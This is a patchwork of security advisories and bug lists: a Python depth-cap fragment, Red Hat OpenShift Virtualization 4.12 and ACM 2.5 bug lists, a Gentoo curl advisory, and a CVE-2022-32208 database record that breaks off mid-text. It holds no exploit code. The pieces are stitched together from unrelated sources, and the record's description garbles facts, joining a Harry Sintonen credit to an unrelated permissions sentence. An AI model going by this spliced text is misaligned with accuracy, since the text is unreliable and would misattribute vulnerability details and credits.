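        elif ch == ")":
            depth -= 1
    return deepest
```

With the cap in place, a crafted input like ten thousand opening brackets is rejected with a clean error instead of crashing the process via stack exhaustion.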
RHEL-8-CNV-4.12
============= bridge-marker-container-v4.12.0-24 cluster-network-addons-operator-container-v4.12.0-24 cnv-containernetworking-plugins-container-v4.12.0-24 cnv-must-gather-container-v4.12.0-58 hco-bundle-registry-container-v4.12.0-769 hostpath-csi-driver-container-v4.12.0-30 hostpath-provisioner-container-v4.12.0-30 hostpath-provisioner-operator-container-v4.12.0-31 hyperconverged-cluster-operator-container-v4.12.0-96 hyperconverged-cluster-webhook-container-v4.12.0-96 kubemacpool-container-v4.12.0-24 kubevirt-console-plugin-container-v4.12.0-182 kubevirt-ssp-operator-container-v4.12.0-64 kubevirt-tekton-tasks-cleanup-vm-container-v4.12.0-55 kubevirt-tekton-tasks-copy-template-container-v4.12.0-55 kubevirt-tekton-tasks-create-datavolume-container-v4.12.0-55 kubevirt-tekton-tasks-create-vm-from-template-container-v4.12.0-55 kubevirt-tekton-tasks-disk-virt-customize-container-v4.12.0-55 kubevirt-tekton-tasks-disk-virt-sysprep-container-v4.12.0-55 kubevirt-tekton-tasks-modify-vm-template-container-v4.12.0-55 kubevirt-tekton-tasks-operator-container-v4.12.0-40 kubevirt-tekton-tasks-wait-for-vmi-status-container-v4.12.0-55 kubevirt-template-validator-container-v4.12.0-32 libguestfs-tools-container-v4.12.0-255 ovs-cni-marker-container-v4.12.0-24 ovs-cni-plugin-container-v4.12.0-24 virt-api-container-v4.12.0-255 virt-artifacts-server-container-v4.12.0-255 virt-cdi-apiserver-container-v4.12.0-72 virt-cdi-cloner-container-v4.12.0-72 virt-cdi-controller-container-v4.12.0-72 virt-cdi-importer-container-v4.12.0-72 virt-cdi-operator-container-v4.12.0-72 virt-cdi-uploadproxy-container-v4.12.0-71 virt-cdi-uploadserver-container-v4.12.0-72 virt-controller-container-v4.12.0-255 virt-exportproxy-container-v4.12.0-255 virt-exportserver-container-v4.12.0-255 virt-handler-container-v4.12.0-255 virt-launcher-container-v4.12.0-255 virt-operator-container-v4.12.0-255 virtio-win-container-v4.12.0-10 vm-network-latency-checkup-container-v4.12.0-89
- Bugs fixed (https://bugzilla.redhat.com/):
1719190 - Unable to cancel live-migration if virt-launcher pod in pending state
2023393 - [CNV] [UI]Additional information needed for cloning when default storageclass in not defined in target datavolume
2030801 - CVE-2021-44716 golang: net/http: limit growth of header canonicalization cache
2030806 - CVE-2021-44717 golang: syscall: don't close fd 0 on ForkExec error
2040377 - Unable to delete failed VMIM after VM deleted
2046298 - mdevs not configured with drivers installed, if mdev config added to HCO CR before drivers are installed
2052556 - Metric "kubevirt_num_virt_handlers_by_node_running_virt_launcher" reporting incorrect value
2053429 - CVE-2022-23806 golang: crypto/elliptic: IsOnCurve returns true for invalid field elements
2053532 - CVE-2022-23772 golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString
2053541 - CVE-2022-23773 golang: cmd/go: misinterpretation of branch names can lead to incorrect access control
2060499 - [RFE] Cannot add additional service (or other objects) to VM template
2069098 - Large scale |VMs migration is slow due to low migration parallelism
2070366 - VM Snapshot Restore hangs indefinitely when backed by a snapshotclass
2071491 - Storage Throughput metrics are incorrect in Overview
2072797 - Metrics in Virtualization -> Overview period is not clear or configurable
2072821 - Top Consumers of Storage Traffic in Kubevirt Dashboard giving unexpected numbers
2079916 - KubeVirt CR seems to be in DeploymentInProgress state and not recovering
2084085 - CVE-2022-29526 golang: syscall: faccessat checks wrong group
2086285 - [dark mode] VirtualMachine - in the Utilization card the percentages and the graphs not visible enough in dark mode
2086551 - Min CPU feature found in labels
2087724 - Default template show no boot source even there are auto-upload boot sources
2088129 - [SSP] webhook does not comply with restricted security context
2088464 - [CDI] cdi-deployment does not comply with restricted security context
2089391 - Import gzipped raw file causes image to be downloaded and uncompressed to TMPDIR
2089744 - HCO should label its control plane namespace to admit pods at privileged security level
2089751 - 4.12.0 containers
2089804 - 4.12.0 rpms
2091856 - "Edit BootSource" action should have more explicit information when disabled
2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add
2092796 - [RFE] CPU|Memory display in the template card is not consistent with the display in the template drawer
2093771 - The disk source should be PVC if the template has no auto-update boot source
2093996 - kubectl get vmi API should always return primary interface if exist
2094202 - Cloud-init username field should have hint
2096285 - KubeVirt CR API documentation is missing docs for many fields
2096780 - [RFE] Add ssh-key and sysprep to template scripts tab
2097436 - Online disk expansion ignores filesystem overhead change
2097586 - AccessMode should stay on ReadWriteOnce while editing a disk with storage class HPP
2099556 - [RFE] Add option to enable RDP service for windows vm
2099573 - [RFE] Improve template's message about not editable
2099923 - [RFE] Merge "SSH access" and "SSH command" into one
2100290 - Error is not dismissed on catalog review page
2100436 - VM list filtering ignores VMs in error-states
2100442 - [RFE] allow enabling and disabling SSH service while VM is shut down
2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS
2100629 - Update nested support KBASE article
2100679 - The number of hardware devices is not correct in vm overview tab
2100682 - All hardware devices get deleted while just delete one
2100684 - Workload profile are not editable during creation and after creation
2101144 - VM filter has two "Other" checkboxes which are triggered together
2101164 - [dark mode] Number of alerts in Alerts card not visible enough in dark mode
2101167 - Edit buttons clickable area is too large.
2101333 - [e2e] elements on Template Scheduling tab are missing proper data-test-id
2101335 - Clone action enabled in VM list kebab button for a VM in CrashLoopBackOff state
2101390 - Easy to miss the "tick" when adding GPU device to vm via UI
2101394 - [e2e] elements on VM Scripts tab are missing proper data-test-id
2101423 - wrong user name on using ignition
2101430 - Using CLOUD_USER_PASSWORD in Templates parameters breaks VM review page
2101445 - "Pending changes - Boot Order"
2101454 - Cannot add PVC boot source to template in 'Edit Boot Source Reference' view as a non-priv user
2101499 - Cannot add NIC to VM template as non-priv user
2101501 - NAME parameter in VM template has no effect.
2101628 - non-priv user cannot load dataSource while edit template's rootdisk
2101667 - VMI view is not aligned with vm and tempates
2101681 - All templates are labeling "source available" in template list page
2102074 - VM Creation time on VM Overview Details card lacks string
2102125 - vm clone modal is displaying DV size instead of PVC size
2102132 - align the utilization card of single VM overview with the design
2102138 - Should the word "new" be removed from "Create new VirtualMachine from catalog"?
2102256 - Add button moved to right
2102448 - VM disk is deleted by uncheck "Delete disks (1x)" on delete modal
2102475 - Template 'vm-template-example' should be filtered by 'Fedora' rather than 'Other'
2102561 - sysprep-info should link to downstream doc
2102737 - Clone a VM should lead to vm overview tab
2102740 - "Save" button on vm clone modal should be "Clone"
2103806 - "404: Not Found" appears shortly by clicking the PVC link on vm disk tab
2103807 - PVC is not named by VM name while creating vm quickly
2103817 - Workload profile values in vm details should align with template's value
2103844 - VM nic model is empty
2104331 - VM list page scroll up automatically
2104402 - VM create button is not enabled while adding multiple environment disks
2104422 - Storage status report "OpenShift Data Foundation is not available" even the operator is installed
2104424 - Enable descheduler or hide it on template's scheduling tab
2104479 - [4.12] Cloned VM's snapshot restore fails if the source VM disk is deleted
2104480 - Alerts in VM overview tab disappeared after a few seconds
2104785 - "Add disk" and "Disks" are on the same line
2104859 - [RFE] Add "Copy SSH command" to VM action list
2105257 - Can't set log verbosity level for virt-operator pod
2106175 - All pages are crashed after visit Virtualization -> Overview
2106963 - Cannot add configmap for windows VM
2107279 - VM Template's bootable disk can be marked as bootable
2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read
2107371 - CVE-2022-30630 golang: io/fs: stack exhaustion in Glob
2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header
2107376 - CVE-2022-1962 golang: go/parser: stack exhaustion in all Parse* functions
2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working
2107386 - CVE-2022-30632 golang: path/filepath: stack exhaustion in Glob
2107388 - CVE-2022-30635 golang: encoding/gob: stack exhaustion in Decoder.Decode
2107390 - CVE-2022-28131 golang: encoding/xml: stack exhaustion in Decoder.Skip
2107392 - CVE-2022-30633 golang: encoding/xml: stack exhaustion in Unmarshal
2108339 - datasource does not provide timestamp when updated
2108638 - When chosing a vm or template while in all-namespace, and returning to list, namespace is changed
2109818 - Upstream metrics documentation is not detailed enough
2109975 - DataVolume fails to import "cirros-container-disk-demo" image
2110256 - Storage -> PVC -> upload data, does not support source reference
2110562 - CNV introduces a compliance check fail in "ocp4-moderate" profile - routes-protected-by-tls
2111240 - GiB changes to B in Template's Edit boot source reference modal
2111292 - kubevirt plugin console is crashed after creating a vm with 2 nics
2111328 - kubevirt plugin console crashed after visit vmi page
2111378 - VM SSH command generated by UI points at api VIP
2111744 - Cloned template should not label app.kubernetes.io/name: common-templates
2111794 - the virtlogd process is taking too much RAM! (17468Ki > 17Mi)
2112900 - button style are different
2114516 - Nothing happens after clicking on Fedora cloud image list link
2114636 - The style of displayed items are not unified on VM tabs
2114683 - VM overview tab is crashed just after the vm is created
2115257 - Need to Change system-product-name to "OpenShift Virtualization" in CNV-4.12
2115258 - The storageclass of VM disk is different from quick created and customize created after changed the default storageclass
2115280 - [e2e] kubevirt-e2e-aws see two duplicated navigation items
2115769 - Machine type is updated to rhel8.6.0 in KV CR but not in Templates
2116225 - The filter keyword of the related operator 'Openshift Data Foundation' is 'OCS' rather than 'ODF'
2116644 - Importer pod is failing to start with error "MountVolume.SetUp failed for volume "cdi-proxy-cert-vol" : configmap "custom-ca" not found"
2117549 - Cannot edit cloud-init data after add ssh key
2117803 - Cannot edit ssh even vm is stopped
2117813 - Improve descriptive text of VM details while VM is off
2117872 - CVE-2022-1798 kubeVirt: Arbitrary file read on the host from KubeVirt VMs
2118257 - outdated doc link tolerations modal
2118823 - Deprecated API 1.25 call: virt-cdi-controller/v0.0.0 (linux/amd64) kubernetes/$Format
2119069 - Unable to start windows VMs on PSI setups
2119128 - virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24
2119309 - readinessProbe in VM stays on failed
2119615 - Change the disk size causes the unit changed
2120907 - Cannot filter disks by label
2121320 - Negative values in migration metrics
2122236 - Failing to delete HCO with SSP sticking around
2122990 - VMExport should check APIGroup
2124147 - "ReadOnlyMany" should not be added to supported values in memory dump
2124307 - Ui crash/stuck on loading when trying to detach disk on a VM
2124528 - On upgrade, when live-migration is failed due to an infra issue, virt-handler continuously and endlessly tries to migrate it
2124555 - View documentation link on MigrationPolicies page des not work
2124557 - MigrationPolicy description is not displayed on Details page
2124558 - Non-privileged user can start MigrationPolicy creation
2124565 - Deleted DataSource reappears in list
2124572 - First annotation can not be added to DataSource
2124582 - Filtering VMs by OS does not work
2124594 - Docker URL validation is inconsistent over application
2124597 - Wrong case in Create DataSource menu
2126104 - virtctl image-upload hangs waiting for pod to be ready with missing access mode defined in the storage profile
2126397 - many KubeVirtComponentExceedsRequestedMemory alerts in Firing state
2127787 - Expose the PVC source of the dataSource on UI
2127843 - UI crashed by selecting "Live migration network"
2127931 - Change default time range on Virtualization -> Overview -> Monitoring dashboard to 30 minutes
2127947 - cluster-network-addons-config tlsSecurityProfle takes a long time to update after setting APIServer
2128002 - Error after VM template deletion
2128107 - sriov-manage command fails to enable SRIOV Virtual functions on the Ampere GPU Cards
2128872 - [4.11]Can't restore cloned VM
2128948 - Cannot create DataSource from default YAML
2128949 - Cannot create MigrationPolicy from example YAML
2128997 - [4.11.1]virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24
2129013 - Mark Windows 11 as TechPreview
2129234 - Service is not deleted along with the VM when the VM is created from a template with service
2129301 - Cloud-init network data don't wipe out on uncheck checkbox 'Add network data'
2129870 - crypto-policy : Accepting TLS 1.3 connections by validating webhook
2130509 - Auto image import in failed state with data sources pointing to external manually-created PVC/DV
2130588 - crypto-policy : Common Ciphers support by apiserver and hco
2130695 - crypto-policy : Logging Improvement and publish the source of ciphers
2130909 - Non-privileged user can start DataSource creation
2131157 - KV data transfer rate chart in VM Metrics tab is not displayed
2131165 - [dark mode] Additional statuses accordion on Virtualization Overview page not visible enough
2131674 - Bump virtlogd memory requirement to 20Mi
2132031 - Ensure Windows 2022 Templates are marked as TechPreview like it is done now for Windows 11
2132682 - Default YAML entity name convention.
2132721 - Delete dialogs
2132744 - Description text is missing in Live Migrations section
2132746 - Background is broken in Virtualization Monitoring page
2132783 - VM can not be created from Template with edited boot source
2132793 - Edited Template BSR is not saved
2132932 - Typo in PVC size units menu
2133540 - [pod security violation audit] Audit violation in "cni-plugins" container should be fixed
2133541 - [pod security violation audit] Audit violation in "bridge-marker" container should be fixed
2133542 - [pod security violation audit] Audit violation in "manager" container should be fixed
2133543 - [pod security violation audit] Audit violation in "kube-rbac-proxy" container should be fixed
2133655 - [pod security violation audit] Audit violation in "cdi-operator" container should be fixed
2133656 - [4.12][pod security violation audit] Audit violation in "hostpath-provisioner-operator" container should be fixed
2133659 - [pod security violation audit] Audit violation in "cdi-controller" container should be fixed
2133660 - [pod security violation audit] Audit violation in "cdi-source-update-poller" container should be fixed
2134123 - KubeVirtComponentExceedsRequestedMemory Alert for virt-handler pod
2134672 - [e2e] add data-test-id for catalog -> storage section
2134825 - Authorization for expand-spec endpoint missing
2135805 - Windows 2022 template is missing vTPM and UEFI params in spec
2136051 - Name jumping when trying to create a VM with source from catalog
2136425 - Windows 11 is detected as Windows 10
2136534 - Not possible to specify a TTL on VMExports
2137123 - VMExport: export pod is not PSA complaint
2137241 - Checkbox about delete vm disks is not loaded while deleting VM
2137243 - registery input add docker prefix twice
2137349 - "Manage source" action infinitely loading on DataImportCron details page
2137591 - Inconsistent dialog headings/titles
2137731 - Link of VM status in overview is not working
2137733 - No link for VMs in error status in "VirtualMachine statuses" card
2137736 - The column name "MigrationPolicy name" can just be "Name"
2137896 - crypto-policy: HCO should pick TLSProfile from apiserver if not provided explicitly
2138112 - Unsupported S3 endpoint option in Add disk modal
2138119 - "Customize VirtualMachine" flow is not user-friendly because settings are split into 2 modals
2138199 - Win11 and Win22 templates are not filtered properly by Template provider
2138653 - Saving Template prameters reloads the page
2138657 - Setting DATA_SOURCE_ Template parameters makes VM creation fail
2138664 - VM that was created with SSH key fails to start
2139257 - Cannot add disk via "Using an existing PVC"
2139260 - Clone button is disabled while VM is running
2139293 - Non-admin user cannot load VM list page
2139296 - Non-admin cannot load MigrationPolicies page
2139299 - No auto-generated VM name while creating VM by non-admin user
2139306 - Non-admin cannot create VM via customize mode
2139479 - virtualization overview crashes for non-priv user
2139574 - VM name gets "emptyname" if click the create button quickly
2139651 - non-priv user can click create when have no permissions
2139687 - catalog shows template list for non-priv users
2139738 - [4.12]Can't restore cloned VM
2139820 - non-priv user cant reach vm details
2140117 - Provide upgrade path from 4.11.1->4.12.0
2140521 - Click the breadcrumb list about "VirtualMachines" goes to undefined project
2140534 - [View only] it should give a permission error when user clicking the VNC play/connect button as a view only user
2140627 - Not able to select storageClass if there is no default storageclass defined
2140730 - Links on Virtualization Overview page lead to wrong namespace for non-priv user
2140808 - Hyperv feature set to "enabled: false" prevents scheduling
2140977 - Alerts number is not correct on Virtualization overview
2140982 - The base template of cloned template is "Not available"
2140998 - Incorrect information shows in overview page per namespace
2141089 - Unable to upload boot images.
2141302 - Unhealthy states alerts and state metrics are missing
2141399 - Unable to set TLS Security profile for CDI using HCO jsonpatch annotations
2141494 - "Start in pause mode" option is not available while creating the VM
2141654 - warning log appearing on VMs: found no SR-IOV networks
2141711 - Node column selector is redundant for non-priv user
2142468 - VM action "Stop" should not be disabled when VM in pause state
2142470 - Delete a VM or template from all projects leads to 404 error
2142511 - Enhance alerts card in overview
2142647 - Error after MigrationPolicy deletion
2142891 - VM latency checkup: Failed to create the checkup's Job
2142929 - Permission denied when try get instancestypes
2143268 - Topolvm storageProfile missing accessModes and volumeMode
2143498 - Could not load template while creating VM from catalog
2143964 - Could not load template while creating VM from catalog
2144580 - "?" icon is too big in VM Template Disk tab
2144828 - "?" icon is too big in VM Template Disk tab
2144839 - Alerts number is not correct on Virtualization overview
2153849 - After upgrade to 4.11.1->4.12.0 hco.spec.workloadUpdateStrategy value is getting overwritten
2155757 - Incorrect upstream-version label "v1.6.0-unstable-410-g09ea881c" is tagged to 4.12 hyperconverged-cluster-operator-container and hyperconverged-cluster-webhook-container
Gentoo Linux Security Advisory GLSA 202212-01
https://security.gentoo.org/
Severity: High
Title: curl: Multiple Vulnerabilities
Date: December 19, 2022
Bugs: #803308, #813270, #841302, #843824, #854708, #867679, #878365
ID: 202212-01
Synopsis
Multiple vulnerabilities have been found in curl, the worst of which could result in arbitrary code execution.
Background
A command line tool and library for transferring data with URLs.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/curl < 7.86.0 >= 7.86.0
Description
Multiple vulnerabilities have been discovered in curl. Please review the CVE identifiers referenced below for details.
Impact
Please review the referenced CVE identifiers for details.
Workaround
There is no known workaround at this time.
Resolution
All curl users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-misc/curl-7.86.0"
References
[ 1 ] CVE-2021-22922 https://nvd.nist.gov/vuln/detail/CVE-2021-22922
[ 2 ] CVE-2021-22923 https://nvd.nist.gov/vuln/detail/CVE-2021-22923
[ 3 ] CVE-2021-22925 https://nvd.nist.gov/vuln/detail/CVE-2021-22925
[ 4 ] CVE-2021-22926 https://nvd.nist.gov/vuln/detail/CVE-2021-22926
[ 5 ] CVE-2021-22945 https://nvd.nist.gov/vuln/detail/CVE-2021-22945
[ 6 ] CVE-2021-22946 https://nvd.nist.gov/vuln/detail/CVE-2021-22946
[ 7 ] CVE-2021-22947 https://nvd.nist.gov/vuln/detail/CVE-2021-22947
[ 8 ] CVE-2022-22576 https://nvd.nist.gov/vuln/detail/CVE-2022-22576
[ 9 ] CVE-2022-27774 https://nvd.nist.gov/vuln/detail/CVE-2022-27774
[ 10 ] CVE-2022-27775 https://nvd.nist.gov/vuln/detail/CVE-2022-27775
[ 11 ] CVE-2022-27776 https://nvd.nist.gov/vuln/detail/CVE-2022-27776
[ 12 ] CVE-2022-27779 https://nvd.nist.gov/vuln/detail/CVE-2022-27779
[ 13 ] CVE-2022-27780 https://nvd.nist.gov/vuln/detail/CVE-2022-27780
[ 14 ] CVE-2022-27781 https://nvd.nist.gov/vuln/detail/CVE-2022-27781
[ 15 ] CVE-2022-27782 https://nvd.nist.gov/vuln/detail/CVE-2022-27782
[ 16 ] CVE-2022-30115 https://nvd.nist.gov/vuln/detail/CVE-2022-30115
[ 17 ] CVE-2022-32205 https://nvd.nist.gov/vuln/detail/CVE-2022-32205
[ 18 ] CVE-2022-32206 https://nvd.nist.gov/vuln/detail/CVE-2022-32206
[ 19 ] CVE-2022-32207 https://nvd.nist.gov/vuln/detail/CVE-2022-32207
[ 20 ] CVE-2022-32208 https://nvd.nist.gov/vuln/detail/CVE-2022-32208
[ 21 ] CVE-2022-32221 https://nvd.nist.gov/vuln/detail/CVE-2022-32221
[ 22 ] CVE-2022-35252 https://nvd.nist.gov/vuln/detail/CVE-2022-35252
[ 23 ] CVE-2022-35260 https://nvd.nist.gov/vuln/detail/CVE-2022-35260
[ 24 ] CVE-2022-42915 https://nvd.nist.gov/vuln/detail/CVE-2022-42915
[ 25 ] CVE-2022-42916 https://nvd.nist.gov/vuln/detail/CVE-2022-42916
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/202212-01
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2022 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5

Bugs fixed (https://bugzilla.redhat.com/):
2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read
- See the following Release Notes documentation, which will be updated shortly for this release, for additional details about this release:
https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.5/html/release_notes/
Security fixes:
- moment: inefficient parsing algorithm resulting in DoS (CVE-2022-31129)
- vm2: Sandbox Escape in vm2 (CVE-2022-36067)
Bug fixes:
- Submariner Globalnet e2e tests failed on MTU between On-Prem to Public clusters (BZ# 2074547)
- OCP 4.11 - Install fails because of: pods "management-ingress-63029-5cf6789dd6-" is forbidden: unable to validate against any security context constraint (BZ# 2082254)
- subctl gather fails to gather libreswan data if CableDriver field is missing/empty in Submariner Spec (BZ# 2083659)
- Yaml editor for creating vSphere cluster moves to next line after typing (BZ# 2086883)
- Submariner addon status doesn't track all deployment failures (BZ# 2090311)
- Unable to deploy Hypershift operator on MCE hub using ManagedClusterAddOn without including s3 secret (BZ# 2091170)
- After switching to ACM 2.5 the managed clusters log "unable to create ClusterClaim" errors (BZ# 2095481)
- Enforce failed and report the violation after modified memory value in limitrange policy (BZ# 2100036)
- Creating an application fails with "This application has no subscription match selector (spec.selector.matchExpressions)" (BZ# 2101577)
- Inconsistent cluster resource statuses between "All Subscription" topology and individual topologies (BZ# 2102273)
- managed cluster is in "unknown" state for 120 mins after OADP restore (BZ# 2103653)
- RHACM 2.5.2 images (BZ# 2104553)
- Subscription UI does not allow binding to label with empty value (BZ# 2104961)
- Upgrade to 2.5.1 from 2.5.0 fails due to missing Subscription CRD (BZ# 2106069)
- Region information is not available for Azure cloud in managedcluster CR (BZ# 2107134)
- cluster uninstall log points to incorrect container name (BZ# 2107359)
- ACM shows wrong path for Argo CD applicationset git generator (BZ# 2107885)
- Single node checkbox not visible for 4.11 images (BZ# 2109134)
- Unable to deploy hypershift cluster when enabling validate-cluster-security (BZ# 2109544)
- Deletion of Application (including app related resources) from the console fails to delete PlacementRule for the application (BZ# 2110026)
- After the creation by a policy of job or deployment (in case the object is missing) ACM is trying to add new containers instead of updating (BZ# 2117728)
- pods in CrashLoopBackoff on 3.11 managed cluster (BZ# 2122292)
- ArgoCD and AppSet Applications do not deploy to local-cluster (BZ# 2124707)

Bugs fixed (https://bugzilla.redhat.com/):
2074547 - Submariner Globalnet e2e tests failed on MTU between On-Prem to Public clusters
2082254 - OCP 4.11 - Install fails because of: pods "management-ingress-63029-5cf6789dd6-" is forbidden: unable to validate against any security context constraint
2083659 - subctl gather fails to gather libreswan data if CableDriver field is missing/empty in Submariner Spec
2086883 - Yaml editor for creating vSphere cluster moves to next line after typing
2090311 - Submariner addon status doesn't track all deployment failures
2091170 - Unable to deploy Hypershift operator on MCE hub using ManagedClusterAddOn without including s3 secret
2095481 - After switching to ACM 2.5 the managed clusters log "unable to create ClusterClaim" errors
2100036 - Enforce failed and report the violation after modified memory value in limitrange policy
2101577 - Creating an application fails with "This application has no subscription match selector (spec.selector.matchExpressions)"
2102273 - Inconsistent cluster resource statuses between "All Subscription" topology and individual topologies
2103653 - managed cluster is in "unknown" state for 120 mins after OADP restore
2104553 - RHACM 2.5.2 images
2104961 - Subscription UI does not allow binding to label with empty value
2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS
2106069 - Upgrade to 2.5.1 from 2.5.0 fails due to missing Subscription CRD
2107134 - Region information is not available for Azure cloud in managedcluster CR
2107359 - cluster uninstall log points to incorrect container name
2107885 - ACM shows wrong path for Argo CD applicationset git generator
2109134 - Single node checkbox not visible for 4.11 images
2110026 - Deletion of Application (including app related resources) from the console fails to delete PlacementRule for the application
2117728 - After the creation by a policy of job or deployment (in case the object is missing) ACM is trying to add new containers instead of updating
2122292 - pods in CrashLoopBackoff on 3.11 managed cluster
2124707 - ArgoCD and AppSet Applications do not deploy to local-cluster
2124794 - CVE-2022-36067 vm2: Sandbox Escape in vm2
{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "universal forwarder",
"scope": "eq",
"trust": 1.0,
"vendor": "splunk",
"version": "9.1.0"
},
{
"_id": null,
"model": "clustered data ontap",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "35"
},
{
"_id": null,
"model": "bootstrap os",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "solidfire",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "universal forwarder",
"scope": "lt",
"trust": 1.0,
"vendor": "splunk",
"version": "9.0.6"
},
{
"_id": null,
"model": "curl",
"scope": "gte",
"trust": 1.0,
"vendor": "haxx",
"version": "7.16.4"
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "macos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "13.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "gte",
"trust": 1.0,
"vendor": "splunk",
"version": "9.0.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "lt",
"trust": 1.0,
"vendor": "splunk",
"version": "8.2.12"
},
{
"_id": null,
"model": "hci management node",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "element software",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "11.0"
},
{
"_id": null,
"model": "curl",
"scope": "lt",
"trust": 1.0,
"vendor": "haxx",
"version": "7.84.0"
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "10.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "gte",
"trust": 1.0,
"vendor": "splunk",
"version": "8.2.0"
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-32208"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "168158"
},
{
"db": "PACKETSTORM",
"id": "168213"
},
{
"db": "PACKETSTORM",
"id": "170741"
},
{
"db": "PACKETSTORM",
"id": "168289"
},
{
"db": "PACKETSTORM",
"id": "168503"
},
{
"db": "PACKETSTORM",
"id": "168378"
}
],
"trust": 0.6
},
"cve": "CVE-2022-32208",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2022-32208",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-424135",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.2,
"id": "CVE-2022-32208",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2022-32208",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2022-32208",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-424135",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-424135"
},
{
"db": "NVD",
"id": "CVE-2022-32208"
},
{
"db": "NVD",
"id": "CVE-2022-32208"
}
]
},
"description": {
"_id": null,
"data": "When curl \u003c 7.84.0 does FTP transfers secured by krb5, it handles message verification failures wrongly. This flaw makes it possible for a Man-In-The-Middle attack to go unnoticed and even allows it to inject data to the client. Harry Sintonen incorrectly handled certain file permissions. \nAn attacker could possibly use this issue to expose sensitive information. \nThis issue only affected Ubuntu 21.10, and Ubuntu 22.04 LTS. (CVE-2022-32207). -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Moderate: curl security update\nAdvisory ID: RHSA-2022:6159-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2022:6159\nIssue date: 2022-08-24\nCVE Names: CVE-2022-32206 CVE-2022-32208\n====================================================================\n1. Summary:\n\nAn update for curl is now available for Red Hat Enterprise Linux 8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant 